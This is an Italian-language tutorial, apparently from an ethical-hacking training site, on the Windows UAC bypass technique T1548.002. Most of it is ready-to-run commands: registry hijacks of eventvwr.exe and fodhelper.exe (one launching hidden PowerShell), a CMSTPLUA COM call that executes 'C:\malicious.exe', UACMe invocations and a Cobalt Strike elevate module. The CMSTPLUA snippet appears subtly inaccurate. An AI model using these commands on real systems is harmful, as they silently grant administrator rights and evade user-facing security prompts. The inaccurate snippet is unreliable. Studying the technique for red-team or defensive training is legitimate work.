Bypass UAC: Bypass User Account Control (T1548.002)

Il bypass di User Account Control rappresenta una delle tecniche più versatili per ottenere privilegi amministrativi su sistemi Windows senza generare i classici prompt di conferma. Questa metodologia sfrutta debolezze architetturali nel meccanismo UAC, permettendo a processi non privilegiati di eseguire operazioni con integrità elevata attraverso l'abuso di binari auto-elevati o oggetti COM specifici.

La tecnica si manifesta in due tattiche principali: TA0004 (Privilege Escalation) quando l'obiettivo è ottenere accesso SYSTEM o amministrativo locale per proseguire l'attacco, e TA0005 (Defense Evasion) poiché aggira silenziosamente i controlli di sicurezza evitando notifiche all'utente. Nella kill chain può apparire sia nella fase di escalation iniziale che in movimenti laterali avanzati.

L'impatto è considerevole: 11 gruppi APT documentati utilizzano attivamente questa tecnica, insieme a 49 software malevoli che integrano bypass UAC. La repository UACME su GitHub cataloga oltre 70 metodi pubblicamente noti, con nuove varianti scoperte regolarmente.

Il metodo più diretto per testare la vulnerabilità UAC utilizza eventvwr.exe, un binario Microsoft auto-elevato. Questo approccio sfrutta la ricerca di chiavi Registry mancanti per eseguire codice arbitrario.

Prima verifica il livello UAC corrente con: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA

Per il bypass classico via eventvwr, crea la chiave Registry: reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f

Quindi esegui semplicemente eventvwr.exe - noterai cmd.exe aprirsi con privilegi elevati senza alcun prompt UAC. Questo funziona perché eventvwr cerca prima in HKCU prima di HKCR per l'handler mscfile.

Un approccio più sofisticato usa fodhelper.exe su Windows 10: reg add HKCU\Software\Classes\ms-settings\shell\open\command /ve /d "powershell.exe -windowstyle hidden -command Start-Process cmd.exe -Verb runAs" /f reg add HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ /d "" /f fodhelper.exe

Per sistemi legacy, il metodo CMSTPLUA COM resta efficace. Usa PowerShell per invocare l'interfaccia COM: $cmstplua = New-Object -ComObject "CMSTPLUA.UAC.Elevator" $cmstplua.ElevateWithPath("C:\malicious.exe")

Tool automatizzati come UACMe includono oltre 70 bypass diversi. Esegui semplicemente: UACMe.exe 23 C:\Windows\System32\cmd.exe

Il numero indica il metodo specifico - 23 corrisponde a sdclt.exe su Windows 10. Per ambienti Red Team, Cobalt Strike integra moduli UAC bypass pronti all'uso tramite il comando elevate uac-token-duplication.

Testa sempre prima in laboratorio isolato, verificando che Windows Defender sia aggiornato per simulare condizioni realistiche.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo